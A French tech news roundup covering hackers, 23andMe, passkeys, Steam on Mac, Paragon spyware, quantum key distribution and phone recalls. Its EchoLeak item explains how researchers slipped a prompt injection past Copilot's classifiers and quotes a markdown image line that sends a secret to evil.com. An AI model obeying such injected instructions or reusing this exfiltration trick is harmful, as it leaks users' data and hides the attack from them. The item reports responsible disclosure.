Composé de cinq ou six hackers jamais condamnés, d’un « personnage central » qui s’est lancé dans ces activités à seulement 19 ans et auquel les enquêteurs reconnaissent des « capacités intellectuelles élevées », le réseau de prévenus est très jeune. Pour son « cerveau », les enquêteurs évoquent une « escalade addictive » dans la « recherche de failles » informatiques, au point d’avoir « continué ses activités » en prison, grâce à des smartphones.

Le reste des membres du réseau sont plutôt connus des forces de police pour des affaires d’escroqueries, violences ou trafic de stupéfiants.

• Cyberdélinquance : 67 % des victimes sont des femmes, 80 % des mis en cause sont des hommes

C’est un « twist » inattendu dans l’histoire de la chute de l’entreprise d’analyse génétique : TTAM Research Institute, une organisation à but non lucratif créé par Anne Wojcicki, a finalement fait une offre supérieure à celle de l’entreprise américaine de biotech Regeneron. Cette organisation a été bâtie dans ce seul but, l’acronyme reprenant les premières lettres de « Twenty three and me ».

Vendredi 13 juin, le Wall Street Journal expliquait que l’organisation de l’ancienne CEO de 23andMe avait fait une offre de 305 millions de dollars. Au début du mois, Regeneron annonçait avoir racheté l’entreprise aux enchères pour 256 millions de dollars, soulevant des interrogations sur la vente des données génétiques sans le consentement explicite des clients de 23andMe.

Anne Wojcicki avait démissionné de son poste de CEO pour pouvoir devenir candidate au rachat de manière indépendante mais l’annonce de Regeneron a fait croire qu’elle était définitivement poussée sur la touche. Regeneron a, selon le Wall Street Journal, refusé de faire une offre supérieure. La proposition de TTAM doit encore être approuvée par la justice étasunienne.

Dans un communiqué, 23andMe explique que TTAM s’aligne sur ses positions concernant la politique de gestion de données de ses clients (notamment les données génétiques). Elle s’engage à leur envoyer des emails pour leur expliquer comment supprimer leurs données, mais reste sur une politique d’ « opt-out » lui permettant de les utiliser sans avoir à redemander le consentement explicite des clients de 23andMe.

Phishing assisté par IA

Les chercheurs de la startup Aim Security ont exploité l’automatisation du traitement des emails par l’IA Copilot de Microsoft pour exfiltrer des données d’un utilisateur. Cette vulnérabilité, nommée EchoLeak, montre comment l’IA générative intégrée à des services en production peut facilement devenir une porte d’entrée pour des attaques discrètes.

La suite bureautique en ligne de Microsoft 365 permettait pendant un temps à une personne mal intentionnée d’exfiltrer les données de ses utilisateurs. C’est l’agent IA Copilot, intégré dans la suite par l’entreprise, qui en était responsable, selon les chercheurs de la startup en sécurité informatique Aim Security. Ils ont rendu publique leur découverte après avoir informé Microsoft, lui donnant le temps de colmater la faille.

La configuration des RAG de Copilot en cause

Dans son billet d’explication, Aim Security explique que cette vulnérabilité – que l’entreprise a nommée EchoLeak – « exploite les défauts de conception typiques des RAG de Copilot ». Les RAG (Retrieval-augmented generation), permettent de plonger une IA générative dans une masse de documents pour qu’elle s’y adapte. Cela permet d’augmenter la pertinence des réponses générées, notamment pour travailler sur des documents internes ou en faire des résumés. Les RAG de Copilot interrogent le Microsoft Graph, une API permettant d’accéder aux données utilisateurs. Ainsi, ils peuvent récupérer les données de la plupart des services proposés par Microsoft :

Mais, jusqu’à récemment, la configuration par défaut de Copilot permettait à des attaquants d’exfiltrer des données sans dépendre d’une action spécifique de l’utilisateur.

Les instructions dans un simple email

L’attaque imaginée par Aim Security se déroule en trois étapes : d’abord l’injection masquée d’instructions à Copilot lui demandant de récupérer des données, puis l’activation de ces instructions et enfin l’exfiltration.

Pour la première étape, les chercheurs de la startup ont envoyé un email au compte utilisateur qu’ils attaquaient. Mais, contrairement au phishing classique, pas besoin ici que l’utilisateur l’ouvre. Il suffit qu’il interroge Copilot sur certains sujets pour que l’IA utilise le contenu du mail comme source.

Un contournement facile des sécurités mises en place par Microsoft

Deuxième étape, l’activation des instructions. Les concepteurs d’agent IA comme Copilot mettent en place des garde-fous pour que, si l’IA tombe sur un texte comportant des instructions, en principe, elle ne les exécute pas. Ces garde-fous sont appelés des classifieurs XPIA (cross-prompt injection attacks, attaques par injection d’instructions croisées).

« Malheureusement », selon les chercheurs d’Aim Security, « il a été facile de contourner ce problème en formulant l’e-mail contenant les instructions malveillantes comme si les instructions étaient destinées au destinataire ». Ils précisent que le contenu de l’e-mail qu’ils ont envoyé n’utilise jamais des termes faisant allusion à l’IA ou à Copilot « afin de s’assurer que les classificateurs XPIA ne détectent pas l’e-mail comme étant malveillant ». Ils ajoutent que les jeux de données qui permettraient de détecter des injections d’instruction sont rares et qu’il existe de nombreux moyens de cacher ce type d’injections.

Si l’utilisateur déclenche le traitement de l’email en interrogeant lui-même Copilot, les chances de réussite sont maximisées. Deux méthodes pour y parvenir, selon Aim Security : soit envoyer un certain nombre d’emails couvrant chacun un sujet, soit envoyer un long email avec chaque sujet traité de façon succincte. Les chercheurs ont choisi la deuxième option, comme ceci :

Le plus difficile reste de sortir les données

Cet email permet donc de déclencher des instructions pour que Copilot aille à la pêche aux données visées. Mais il reste à les exfiltrer. Ils ont d’abord réussi à créer en Markdown un lien dans le chat de Copilot avec des paramètres cachés qui renvoient les informations les plus sensibles.

Mais cela demandait à l’utilisateur de cliquer. Ils ont donc pensé à passer les paramètres via l’intégration d’une image. « Le navigateur essaiera automatiquement de récupérer l’image, de sorte que l’utilisateur n’a pas besoin de cliquer sur quoi que ce soit, mais le navigateur « cliquera sur le lien » pour nous », expliquent-ils.

« Les images markdown sont formatées de la même manière que les liens markdown, mais elles sont précédées d’un point d’exclamation :

![Image alt text](https://www.evil.com/image.png?param=<secret>)

« Ce formatage d’image en markdown est également soumis à la même rédaction que les liens », ajoutent-ils.

Reste un problème : Microsoft ne permet pas d’insérer n’importe quel lien dans les images. Seuls des liens vers différents serveurs listés par l’entreprise sont permis. Après avoir fouillé différentes façons d’utiliser ces serveurs, les chercheurs de Aim Security ont trouvé un lien lié à Teams qui permettait d’exécuter une requête GET sans nécessité d’interaction avec l’utilisateur.

Enfin, ils ont réussi à affiner leur attaque de façon à ce que l’email envoyé pour mettre en place l’attaque ne soit jamais découvert : « Pour ce faire, il suffit de demander au « destinataire de l’email » de ne jamais faire référence à ce courriel pour des raisons de confidentialité ».

Cinq mois pour trouver une solution

Le fondateur d’Aim Security, Adir Gruss, a expliqué au média Fortune que son équipe a découvert la faille et contacté Microsoft en janvier dernier. « Ils nous ont dit que c’était une véritable révolution pour eux », explique-t-il. Mais Microsoft a mis cinq mois à boucher la faille, ce qui « est un délai (très) élevé pour ce type de problème », a-t-il commenté.

« Nous remercions Aim d’avoir identifié et signalé ce problème de manière responsable afin qu’il puisse être résolu avant que nos clients ne soient affectés », a déclaré de son côté Microsoft. L’entreprise a ajouté : « Nous avons déjà mis à jour nos produits pour atténuer ce problème, et aucune action de la part de nos clients n’est nécessaire. Nous mettons également en œuvre des mesures supplémentaires de défense en profondeur afin de renforcer notre position en matière de sécurité ».

Approuvé par Juliette Nichols

Les clés d’accès, ou passkeys, sont souvent présentées comme la solution idéale pour remplacer les mots de passe. Elles ont notamment pour avantage de ne pas pouvoir être volées. Elles ont cependant un gros inconvénient : la complexité pour les transférer d’un compte à un autre. Apple a confirmé que toutes les versions 26 de ses plateformes prendront en charge cette opération.

Les clés d’accès ont de nombreux avantages par rapport aux mots de passe traditionnels. Il n’y a pas d’information à retenir, elles sont uniques et reposent sur une architecture de clés publiques/privées. Ainsi, la première est publique et est stockée par le service sur lequel on souhaite s’identifier. L’autre est privée, n’appartient qu’à l’utilisateur et est stockée dans une zone sécurisée. Toute utilisation de la clé privée demande une authentification, biométrique par défaut.

• Clés d’accès (passkeys) : leur importance et leur fonctionnement

Le gros avantage de cette infrastructure est que la clé privée ne sort jamais de son antre. Lorsque l’on veut se connecter, une autorisation d’accès est demandée. Après authentification, un jeton est émis, basé sur la clé privée. Ce jeton est alors mis en contact avec la clé publique. Si la négociation se passe bien, la connexion est autorisée. L’intégralité du mécanisme repose sur le protocole WebAuthn (Web Authentication de l’alliance FIDO, un consortium réunissant tous les principaux acteurs dans ce domaine, dont Apple, Google et Microsoft.

Le danger des silos

Comme nous l’avions indiqué en novembre 2024, les clés d’accès souffrent actuellement d’un défaut majeur. Si vous restez constamment connecté dans le même univers centré sur un fournisseur, ce n’est pas un problème. Mais si vous comptez changer, ou si vous avez un lot hétérogène d’appareils, comme c’est le cas chez beaucoup de personnes, la situation est un peu compliquée.

Les principaux éditeurs proposent tous depuis plusieurs années la compatibilité avec les clés d’accès. Ils tentent de motiver les internautes en proposant régulièrement de passer à ce mode de connexion. Cependant, pour des questions pratiques, ces clés sont synchronisées avec le compte maison. Comme nous l’avions montré, Google synchronise ainsi les clés via Chrome, qui a l’avantage d’être disponible partout. Le navigateur peut même être paramétré comme gestionnaire de mots de passes (et de clés d’accès) sur d’autres plateformes, y compris iOS.

• Clés d’accès (passkeys) : après la théorie, place à la pratique !

Le problème se voit de loin : si l’on passe plusieurs années dans un environnement synchronisé par un certain compte, comment changer de crèmerie ? La question est valable autant pour les trois principaux éditeurs de systèmes d’exploitation que pour les gestionnaires tiers. Avec les mots de passe, il y a possibilité d’exportation, le plus souvent sous forme de fichier CSV ou JSON. Mais une solution équivalente pour les clés d’accès romprait leur promesse principale en sortant les clés privées de leur enclave et en les rendant vulnérables.

Cette limitation, inhérente à la première version du mécanisme, a engendré bon nombre de critiques. Certaines personnes ont ainsi estimé que les clés d’accès n’étaient qu’un moyen supplémentaire de verrouiller un peu plus les utilisateurs dans certains écosystèmes. Pourtant, rester maitre de ses clés et pouvoir les déplacer sont des conditions sine qua non de leur succès. L’alliance FIDO avait donc commencé à travailler sur une extension du standard, avec notamment un protocole et un format de données pour sécuriser les échanges.

Généralisation des échanges dans les versions 26 chez Apple

Avantage de l’alliance FIDO, elle réunit sous un même toit tous les principaux acteurs considérés comme fournisseurs d’authentification. On y trouve ainsi 1Password, BitWarden, Dashlane, Devolution ou encore Okta. Autant de noms que l’on retrouvait en mars dans le brouillon du Credential Exchange Format, la nouvelle structure de données pour les échanges de clés.

Apple, en marge de sa WWDC, a publié une vidéo pour faire le point sur les nouveautés des clés d’accès. L’entreprise rappelle que le mécanisme est en lui-même « un voyage », qui change progressivement les habitudes. « Les gens sont propriétaires de leurs informations d’identification et devraient avoir la possibilité de les gérer comme ils l’entendent. Cela permet aux gens de mieux contrôler leurs données et de choisir le gestionnaire d’informations d’identification qu’ils utilisent », explique l’entreprise.

Apple présente le nouveau mécanisme comme « fondamentalement différent et plus sûr que les méthodes traditionnelles d’exportation ». Celles-ci passent le plus souvent par l’enregistrement des informations dans un fichier non chiffré, puis son importation manuelle dans une autre application. Dans la nouvelle solution, le partage des clés est initié depuis l’application qui les gère habituellement (l’app Mots de passe, chez Apple). On sélectionne alors l’application de destination, qui aura exposé cette capacité. L’opération doit être validée par une authentification et le transfert se base sur le format de données défini par l’alliance FIDO.

« Le système fournit un mécanisme sécurisé pour déplacer les données entre les applications. Aucun fichier non sécurisé n’est créé sur le disque, ce qui élimine le risque de fuite de données d’identification à partir de fichiers exportés. Il s’agit d’un moyen moderne et sûr de transférer des informations d’identification », explique Apple dans sa vidéo.

Côté applications et sites web, aucune modification n’est nécessaire. Elles continueront à s’adresser au gestionnaire de mots de passe et clés d’accès déclaré par défaut. Du côté des développeurs qui veulent pouvoir intégrer ces capacités dans leurs gestionnaires, il faut regarder du côté de deux nouvelles classes créées pour les versions 26 des plateformes d’Apple, ASCredentialImportManager et ASCredentialExportManager.

Précisons enfin que ces annonces sont basées sur un standard en brouillon. L’extension de la norme devrait être finalisée dans les prochains mois. Au vu des participants, ces fonctions vont se retrouver prochainement dans l’ensemble des plateformes et gestionnaires.

Si vous jouez sur Mac, vous avez peut-être Steam. Et si vous l’avez, vous savez que certains jeux peuvent fonctionner nativement sur les Mac munis de puces Apple Silicon (M1 à M4), mais que le client Steam lui-même est épouvantable.

• Un an avec un MacBook Pro Apple Silicon (M1) : bilan et retour d’expérience

Déjà à l’époque de la puce M1, quand nous avions publié un retour d’expérience d’un an sur un MacBook Pro M1, nous avions souligné l’évolution notable du parc logiciel. La suite Office de Microsoft, par exemple, avait été prête dès le départ, alors que Teams avait dû attendre plus de deux ans. D’autres applications, comme Discord, avaient également pris un peu leur temps. Et dans ces applications non compatibles, Steam remportait la palme de l’utilisation la plus éprouvante.

Il existe en effet une différence conséquente de performances entre une application native, compilée pour l’architecture arm64, et une application d’ancienne génération, compilée pour x86_64, à la grande époque des Mac Intel. Quand une telle application est exécutée sur une machine Apple Silicon, Rosetta 2 est appelé à la rescousse. Cette couche d’émulation donne de bons résultats, mais le lancement des applications reste lent, voire très lent.

Or, Apple a annoncé en marge de sa WWDC que Rosetta 2 serait présent dans le futur macOS 27, qui sera présenté l’année prochaine, mais plus dans macOS 28. Nous nous posions alors la question de ce qu’il adviendrait pour les applications non natives. Hasard ou non du calendrier, Valve vient de publier une nouvelle version bêta de son client Steam, compilée nativement pour l’architecture Apple Silicon.

Si vous basculez Steam en bêta (Paramètres > Interface) et que vous redémarrez l’application, une mise à jour va s’installer (environ 230 Mo). Au redémarrage de Steam, vous devriez constater que le client se charge beaucoup plus rapidement. L’application est en outre bien plus réactive, surtout dans des opérations simples comme le redimensionnement. Il n’y a en revanche aucune différence visuelle.

Valve ne s’est jamais vraiment expliquée sur le retard de cette version, quand la quasi-totalité du parc logiciel s’était déjà adapté. On peut supposer que l’entreprise n’accorde pas une très grande importance au parc Mac. Rappelons quand même que si Valve n’avait pas touché au client lui-même, l’entreprise avait assez rapidement proposé une mise à jour des composants afin que les jeux compilés nativement pour Apple Silicon soient pris en charge.

Grillé

Les analyses des chercheurs du Citizen Lab confirment que l’iPhone d’un journaliste européen « éminent » a été infecté par Graphite, le logiciel espion de Paragon. Ils assurent aussi que celui du journaliste italien Ciro Pellegrino a bien été ciblé sans pour autant confirmer ou infirmer le succès de l’attaque sur son smartphone.

Alors que l’Italie a récemment reconnu avoir utilisé le logiciel espion de Paragon et clôturé ses contrats avec l’entreprise israélienne, les chercheurs du Citizen Lab confirme que ce logiciel a été utilisé pour surveiller des journalistes européens.

• L’Italie clot ses contrats Paragon et reconnaît l’usage de ses logiciels espion

Les chercheurs de ce laboratoire de l’Université de Toronto expliquent dans un billet publié ce jeudi 12 juin qu’ils ont analysé les appareils Apple d’un « éminent journaliste européen qui a demandé de rester anonyme ». Celui-ci a reçu fin avril, comme quelques autres personnes dont des militants d’ONG d’aide aux migrants, une notification envoyée par Apple l’informant qu’il aurait été visé par un logiciel espion.

Des traces de requêtes vers une instance du logiciel et vers un serveur de Paragon

« Notre investigation numérique a conclu que l’un des appareils du journaliste a été compromis par le logiciel espion Graphite de Paragon en janvier et début février 2025 alors qu’il fonctionnait sous iOS 18.2.1 », expliquent-ils. Ils ont notamment retrouvé des logs répertoriant des requêtes envoyées à un serveur qu’ils avaient préalablement identifié comme hébergeant une instance du logiciel espion.

En parallèle, ils ont identifié un compte iMessage dans les logs de l’appareil qui envoyait au même moment des informations vers un serveur de Paragon. Ce compte aurait été utilisé pour mettre en place une attaque zéro-clic par l’entreprise pour déployer Graphite.

Apple a confirmé à Citizen Lab que cette attaque était maintenant atténuée depuis la version 18.3.1 d’iOS. L’entreprise à la Pomme explique que cette attaque utilisait une faille lors du traitement d’une photo ou d’une vidéo malveillante partagée via un lien iCloud.

Confirmation d’une attaque contre l’iPhone du journaliste italien Ciro Pellegrino

Les chercheurs du Citizen Lab confirme par ailleurs que le journaliste italien Ciro Pellegrino, qui avait lui aussi reçu en avril la notification d’Apple d’une possible attaque d’un logiciel espion, avait bien été ciblé par des utilisateurs du logiciel espion Graphite, sans pouvoir confirmer ou infirmer le succès de l’attaque.

Ciro Pellegrino, responsable de la rédaction napolitaine du média Fanpage.it, où il a publié plusieurs enquêtes marquantes dans son pays, est le second journaliste de Fanpage.it à avoir été attaqué. On savait depuis février que son collègue Francesco Cancellato, qui a enquêté sur les jeunes fascistes qui militent dans le parti d’extrême droite de la première ministre Giorgia Meloni, faisait partie des personnes ciblées.

Les conclusions du Citizen Lab remettent en question les conclusions de la Commission parlementaire pour la sécurité de la République (COPASIR) italienne sur le sujet. Si elle avait confirmé le ciblage de militants de certaines associations d’aide aux migrants comme Mediterranea Saving Humans et Refugees in Libya, elle n’avait rien conclu quant au ciblage de journalistes.

L’entreprise israélienne, de son côté, avait accusé le gouvernement italien d’avoir refusé son aide pour déterminer si son logiciel avait été utilisé pour cibler un journaliste. Les services de renseignement avaient affirmé avoir rejeté l’offre de Paragon en raison des problèmes de sécurité nationale liés à la divulgation de leurs activités à une entreprise étrangère.

Paragon n’a pas répondu aux chercheurs du Citizen Lab qui lui avaient envoyé leurs conclusions ce mardi 10 juin.

T’inquiète, c’est quantique

Orange commercialise, pour la première fois en France, un ensemble de produits permettant à des entreprises de mettre en place un « réseau quantique » à partir de son réseau en fibre optique. Une telle solution permet de s’assurer que le chiffrement des données résistera aux ordinateurs quantiques.

L’informatique quantique fait planer depuis maintenant de très nombreuses années un risque sur la cybersécurité et plus particulièrement le chiffrement des données. Les messages anxiogènes se multiplient au fil des années, à tous les niveaux. Attention par contre à un point important, qui a souvent tendance à passer à la trappe : tous les algorithmes ne sont pas logés à la même enseigne, loin de là même.

Dans les grandes lignes, les algorithmes de chiffrement asymétriques (comme RSA) tomberont purement et simplement avec des ordinateurs quantiques disposant de suffisamment de qubits (on n’y est pas encore). Par contre, avec les algorithmes symétriques (AES par exemple), il suffit de doubler la taille des clés pour se protéger des futurs ordinateurs quantiques.

• [FAQ] Notre antisèche sur l’informatique quantique

Faut-il avoir peur des ordinateurs quantiques ? Oui, mais…

La question n’est pas tellement de savoir si l’ordinateur quantique avec des capacités suffisantes (qubits, portes, etc.) va arriver, mais quand il sera une réalité. Il faut donc se préparer dès maintenant, surtout pour des données vitales, dont la durée de vie du « secret » doit être de plusieurs (dizaines d’) années. Idéalement, il aurait même fallu largement anticiper, surtout que la menace est loin d’être nouvelle.

Les chercheurs et experts en cybersécurité n’ont d’ailleurs pas attendu la suprématie quantique sur le chiffrement pour développer des contre-mesures. Chez Google par exemple, des expérimentations ont officiellement débuté il y a quasiment 10 ans pour le grand public, sur des connexions entre Chrome Canary et ses serveurs.

Spoiler alerte : on sait, depuis des années, parfaitement se protéger des méchants ordinateurs quantiques. La théorie ne soulève aucune inquiétude, mais la mise en pratique est plus compliquée (et souvent couteuse). Orange vient de franchir une étape avec le lancement du « premier service commercial de réseau quantique sécurisé en France ». Nous avons été à la rencontre de l’opérateur à Vivatech.

Orange commercialise un « réseau quantique » clé en main

Dans ce court intitulé, « premier service commercial de réseau quantique sécurisé en France », tous les mots sont importants. Ce n’est en effet pas le premier réseau du genre non commercial en France, ni le premier réseau commercial dans le monde ni même en Europe. Orange Business s’est associé à Toshiba pour son service Orange Quantum Defender afin de proposer une solution clé en mains.

Le fonctionnement repose sur deux piliers cryptographiques, bien connu des experts : la distribution de clés quantiques (QKD) et la cryptographie post-quantique (PQC). On en parle même depuis des années sur Next.

La QKD « est la seule méthode de génération de clé offrant une sécurité absolue dans le sens de la théorie de l’information, et elle a l’avantage d’être sûre face à des attaques futures : il n’est pas possible pour un espion de conserver une copie des signaux quantiques envoyés dans un processus de QKD, en raison du théorème de non-clonage quantique », expliquait il y a déjà plusieurs années Eleni Diamanti, alors au Laboratoire d’informatique de Paris 6.

• Chiffrement et sécurité dans tous leurs états, du WEP à la distribution quantique de clés

Dans le cas d’Orange, la distribution de clés quantiques se fait via des photons à travers les fibres d’Orange (sur son réseau déjà déployé). Un tel dispositif avait déjà été démontré l’année dernière. La fibre relie en fait deux « serveurs » Toshiba (format rackable), un dans chaque lieu à relier avec le « réseau quantique ».

La distribution de clés quantiques passe dans des fibres « classiques »

L’opérateur nous explique que les photons peuvent voyager dans des fibres déjà exploitées pour du transfert de données, y compris en WDM (multiplexage en longueur d‘onde), sans que cela ne pose le moindre problème. Aucune interférence n’a été identifiée par l’opérateur, que ce soit sur la partie quantique ou la partie classique.

Attention toutefois, le QKD ne peut plus être utilisé si la fibre passe dans un équipement actif ; les photons perdraient immédiatement leur état quantique et donc adieu la distribution de clés. Il faut donc une fibre unique de bout en bout. Une épissure est possible, mais elle doit « être de très bonne qualité » pour laisser passer les photons, nous précise l’opérateur.

PCQ : de la cryptographie hybride, résistante aux ordinateurs quantiques

La portée est actuellement autour de 100 à 150 km, nous affirme Orange, mais il est prévu de l‘augmenter ; tout du moins c’est ce que prévoit Toshiba avec son matériel, selon l’opérateur. À l’avenir, il sera même possible de doubler la distance avec un « relai » à installer au milieu du « réseau quantique », mais un seul « relai » sera utilisable sur la ligne en fibre optique. N’espérez donc multiplier la distance comme des petits pains.

Une fois l’échange de clé réalisé, la partie quantique est terminée et on repasse sur de la cryptographie hybride. Cette dernière résiste aux attaques des ordinateurs quantiques et s’appuie aussi sur la cryptographie actuelle, qui a fait ses preuves (modulo les calculateurs quantiques) ; le meilleur des mondes en quelque sorte puisqu’il faudrait casser la cryptographie classique et quantique pour accéder aux données.

• Le chiffrement hybride classique et post quantique, comment ça marche

L’annonce d’Orange est donc l’unification de la QKD et de la PCQ pour protéger des données, tout en pouvant être « facilement déployée sur des réseaux de fibre existants ». La nouveauté n’est donc pas à chercher du côté technique, mais commercial avec un système « tout en un » pour les entreprises ayant de forts besoins de sécurité. Le tarif n’est précisé.

Pour de plus longues distance, la QKD passe par l’espace

Orange ne s’arrête pas en si bon chemin et prépare l’avenir : passer de la fibre au satellite. L’opérateur travaille avec Thales cette fois-ci afin de proposer une solution « souveraine ». La France (comme les États-Unis) est en retard sur la Chine, qui a déjà démontré et utilisé un tel réseau, précise Orange. Mais l’opérateur compte bien y arriver d’ici à quelques années.

En Espagne, des travaux ont débuté au début de l’année avec Thales Alenia Space (détenue à 67 % par Thales et 33 % par Leonardo) et l’opérateur de satellites Hispasat. Le 21 janvier, ils ont annoncé « le lancement de la phase de développement, fabrication, vérification et validation du prototype de QKD-GEO, le système espagnol de distribution quantique de clés depuis l’orbite géostationnaire ».

Thales Alenia Space affirmait à l’époque que la technologie disponible début 2025 excluait « toute possibilité de connexions basées sur la fibre optique pour les communications quantiques sur des distances de plusieurs centaines de kilomètres ». Orange pense de son côté pouvoir atteindre quelques centaines de kilomètres. Une chose est néanmoins sûre : les deux s’accordent sur le fait qu’une limite existe et qu’elle sera rapidement atteinte.

Selon la filiale de Thales, « le recours aux satellites pour la distribution quantique de clés permet de couvrir de grandes distances, compte tenu que l’affaiblissement du signal est moins important dans l’espace libre ».

Vers des « liaisons quantiques » entre deux continents

Une fois l’atmosphère passée, il n’y a plus vraiment de problème pour faire circuler les photons. Atteindre un satellite en orbite basse à quelques centaines de km ou un géostationnaire à plus de 36 000 km ne change pas grand-chose. Avec des satellites géostationnaires, cela permet par contre « d’établir des liaisons continues entre deux continents via un seul satellite et sans la nécessité de systèmes complexes de poursuite du signal ».

Comme avec la fibre, la distribution de clé se fait en exploitant les propriétés de l’informatique quantique, mais le chiffrement des données se fait ensuite de manière « classique », avec des algorithmes hybrides. Rendez-vous dans trois ou quatre ans pour ce genre de solution.

Ça fait beaucoup la non ?

Le DOOGEE X98 dépasse les limites réglementaires du DAS, l’ANFR a donc mis en demeure le fabricant de corriger le tir. Rien n’a été fait et l’Agence sonne donc le retrait et le rappel du smartphone.

L’Agence nationale des fréquences prélève chaque année environ une centaine de terminaux dans le commerce, puis mandate un laboratoire indépendant et certifié pour analyser les niveaux de DAS. La législation impose, en effet, certains seuils limites à ne pas dépasser : 4 W/kg pour le DAS membre (depuis juillet 2020), 2 W/kg pour les DAS tronc et tête.

• Ondes émises par les smartphones : #PhoneGate, risques sanitaires et mesure du DAS

Correctif, rappel… ou faire la sourde oreille

En cas de dépassement, le fabricant est mis en demeure de corriger le tir. Il a deux solutions : déployer un nouveau firmware (qui est l’option généralement privilégiée) ou procéder à un rappel volontaire des smartphones (cela arrive aussi, Orange avec son Hapi 30 par exemple). En cas de mise à jour, l’ANFR vérifie évidemment l’efficacité de la mesure, via de nouvelles mesures en laboratoire.

Si ce n’est toujours pas bon, le fabricant retourne à la case départ avec les deux choix précédents, mais il peut aussi écoper au passage d’une amende administrative (elle ne peut être appliquée qu’en cas de récidive sur le dépassement du DAS). Samsung avait écopé de 7 500 euros (le maximum) pour son Galaxy Z Flip ; la première mise à jour avait en fait aggravé le souci avec un DAS encore plus élevé.

Mais il arrive aussi que le fabricant ne réponde pas et ne corrige donc pas le niveau d’exposition aux ondes.

DOOGEE X98 flashé pour excès de DAS, l’ANFR sonne le rappel

C’est le cas de la société APEX CE SPECIALISTS, responsable de la mise sur le marché du DOOGEE X98. Le smartphone a été flashé avec un DAS membre à 6,25 W/kg pour un maximum de 4 W/kg. Comme toujours en pareille situation, l’ANFR l’a mis en demeure « de prendre toutes les mesures appropriées pour mettre fin aux non-conformités constatées sur les équipements actuellement sur le marché ainsi que ceux déjà commercialisés ».

Aucune mesure n’ayant été prises, « l’ANFR a adopté une décision administrative enjoignant cette société à procéder au retrait du marché français et au rappel du téléphone DOOGEE X98 ». Les distributeurs sont inclus dans la procédure et doivent « prendre de leur propre initiative les mesures de retrait et de rappel du téléphone concerné ».

L’ANFR rappelle à ce titre l’article R. 20-13-1 du CPCE : « les distributeurs qui considèrent, ou ont des raisons de croire, que des équipements radioélectriques qu’ils ont mis à disposition sur le marché ne sont pas conformes à la présente section s’assurent que sont prises les mesures correctrices nécessaires pour les mettre en conformité, les retirer du marché ou les rappeler, si besoin ». Les agents de l’ANFR veilleront à ce que cette décision soit appliqué dans « tous les circuits de distribution disponibles en France ».

Quatrième procédure de retrait pour DOOGEE

Ce n’est pas la première fois que l’ANFR doit prendre ce genre de mesure contre des smartphones de cette marque.

En aout 2024, l’Agence demandait le retrait des DOOGEE N50 (DAS membre à 5,40 W/kg) et S100 PRO (DAS tronc à 2,29 W/kg), dont le responsable de la mise sur le marché était alors PROLINX GmbH. En octobre 2023, c’était le DOOGEE S88 PLUS qui était mesuré avec un DAS membre à 4,23 W/kg. Le responsable de la mise sur le marché était alors DOOGEE, selon l’ANFR.

DOOGEE n’est pas le seul à faire l’objet de procédures de rappel Au début de l’année, les ULEFONE NOTE 16 PRO et OUKITEL WP28 ont fait l’objet d’un retrait du marché et d’une procédure de rappel. Les années précédentes, c’étaient les HOTWAV CYBER 7, EMPORIA SMART 4 et SIMPLICITY V27, l’iPhone 12, RAZER PHONE 2, LEAGOO S8, ALLVIEW X4 SOUL MINI S, NEFFOS X1 TP90 et ORANGE HAPI 30.

Nostalgie numérique

Le groupe lyonnais LDLC a fait état jeudi d’un chiffre d’affaires en baisse de 6,5% sur son exercice clos au 31 mars 2025. Le spécialiste de la distribution informatique affiche un résultat négatif, pénalisé par les plans sociaux lancés au printemps, mais se dit bien armé pour appréhender la reprise attendue du marché. Ses efforts de rationalisation l’amènent toutefois à fermer la boutique associée au site hardware.fr.

L’annonce ne changera pas la face du e-commerce français, mais elle réveillera peut-être des accents de nostalgie chez les lecteurs historiques du site hardware.fr, ou chez les membres de son célèbre forum. Le groupe LDLC, propriétaire du site, a en effet annoncé le 11 juin la fermeture de la boutique intégrée au site depuis 2016.

Fermeture de shop.hardware.fr

« Après bientôt 9 ans d’existence, nous avons décidé de mettre un terme à l’aventure shop.hardware.fr », annonce sobrement le message qui remplace la page d’accueil de la boutique. Les clients, actuels ou passés, ont jusqu’à fin juillet pour suivre l’évolution de leurs commandes ou récupérer leurs factures. « Nous continuerons par ailleurs d’assurer nos obligations », précise l’enseigne, dont le service client reste accessible. Pour de futurs achats, elle renvoie toutefois vers le site de sa maison mère.

La boutique aux couleurs de Hardware.fr a été lancée à l’automne 2016, avec l’idée de capitaliser sur la notoriété du site et de son forum, pour toucher plus efficacement une cible d’acheteurs particuliers avertis. Le site, dont le chiffre d’affaires ou le niveau de rentabilité ne sont pas précisés dans la communication financière de LDLC, reposait logiquement sur des moyens mutualisés avec ceux du groupe.

Activité en berne chez LDLC

Sa fermeture, également annoncée par mail aux clients disposant d’un compte actif, intervient dans un contexte de rationalisation des dépenses chez LDLC, comme en témoignent les derniers résultats financiers du groupe, publiés jeudi 12 juin au soir et portant sur un exercice 2024 - 2025 arrêté au 31 mars dernier.

« Durant cette période, nous avons mis en œuvre des actions portant notamment sur des mesures
organisationnelles et de rationalisation afin de faire face au repli significatif des activités du Groupe et ainsi renforcer notre résilience face à l’état du marché », indique en introduction Olivier de la Clergerie, directeur général du Groupe LDLC.

Sur cet exercice, marqué notamment par la reprise de Rue du Commerce, le groupe lyonnais affiche un chiffre d’affaires consolidé de 534,5 millions d’euros, en baisse de 6,5% (- 7,6% à périmètre constant).

L’activité BtoC (vente aux particuliers via LDLC.com et les autres enseignes du groupe, dont Materiel.net ou TopAchat) recule de 3,6% pour atteindre 378,3 millions d’euros. C’est sur le BtoB (vente aux entreprises et professionnels) que la baisse est plus marquée :- 13%, à 144,3 millions d’euros. « Cette activité a été très fortement impactée sur l’exercice par le contexte macroéconomique et politique incitant à la prudence et au report des investissements des entreprises », commente le groupe.

L’activité des boutiques physiques reste quant à elle stable sur un an, avec 142,6 millions d’euros de chiffre d’affaires (+ 0,9%).

« Une structure financière solide »

En dépit de l’inflation, des négociations annuelles, de l’ouverture de nouvelles boutiques et de l’acquisition de Rue du Commerce, LDLC affirme avoir réussi à maintenir ses dépenses opérationnelles à seulement 0,4% de hausse, sans intégrer encore les baisses de charge de personnel associées aux deux plans de sauvegarde de l’emploi (PSE) lancés en mars dernier, lesquels prévoyaient la suppression de 88 postes.

Le groupe maintient sur son exercice un excédent brut d’exploitation de 2,6 millions d’euros, mais son résultat net ressort en recul à- 10,9 millions d’euros, contre - 0,2 million sur l’exercice précédent, en raison notamment d’une provision de 5,2 millions d’euros constituée au titre des PSE. Il revendique néanmoins une structure financière solide, avec une dette qui progresse pour atteindre 6,3 millions d’euros, mais reste très en deçà des 90 millions d’euros de capitaux propres.

Une reprise à venir ?

